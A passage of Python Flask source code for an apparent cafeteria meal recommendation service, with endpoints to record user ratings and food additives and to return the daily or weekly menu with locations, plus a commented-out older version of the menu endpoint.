jsonify(answer)\n\n\n@app.route(\"/addrating\", methods=[\"POST\"])\ndef add_rating():\n data = request.get_json()\n user_id = data[\"user_id\"]\n m_id = data[\"m_id\"]\n rating = data[\"rating\"]\n r.users.update_rating(user_id, m_id, rating)\n r.update_user_specific_data(user_id)\n return \"Rating added!\"\n\n\n@app.route(\"/addadditives\", methods=[\"POST\"])\ndef add_additives():\n data = request.get_json()\n user_id = data[\"user_id\"]\n additives = data[\"additives\"]\n for additive in additives:\n r.users.update_user_additives(user_id, additive)\n return \"Additives added!\"\n\n\n@app.route(\"/getmeals\", methods=[\"POST\"])\ndef get_meals():\n week = False\n data = request.get_json()\n try:\n day = data[\"day\"]\n if day == 8:\n week = True\n except KeyError:\n day = r.day\n if week:\n menu = r.menu.df_menus.loc[:, 'title'].tolist()\n locs = r.menu.df_menus[\"loc\"].values\n else:\n try:\n menu = r.menu.get_food_per_day(WEEKDAYS[day]).loc[:, \"title\"]\n locs = r.menu.get_food_per_day(WEEKDAYS[day])[\"loc\"].values\n except AttributeError:\n menu = []\n meals = []\n locations = []\n for k, meal in enumerate(menu):\n meals.append([clean_title_additives(meal)])\n locations.append([locs[k]])\n answer = {}\n answer[\"locations\"] = locations\n answer[\"meals\"] = meals\n answer[\"day\"] = day\n return jsonify(answer)\n\n\n# @app.route(\"/getmeals\", methods=['POST'])\n# def get_meals():\n# data = request.get_json()\n# time = data[\"day\"]\n# if time == 'heute':\n# today_weekday = STR_WEEKDAYS_DE[datetime.datetime.now().weekday()]\n# return jsonify({'msg': r.menu.get_food_per_day(today_weekday).loc[:, 'title'].tolist()})\n# elif time == 'morgen':\n# tomorrow_weekday = STR_WEEKDAYS_DE[datetime.datetime.now().weekday()+1]\n# return jsonify({'msg': r.menu.get_food_per_day(tomorrow_weekday).loc[:, 'title'].tolist()})\n# elif time == 'woche':\n# return jsonify({'msg': r.menu.df_menus.loc[:, 'title'].tolist()})\n# else:\n# return jsonify({'error': \"Invalid value for attribute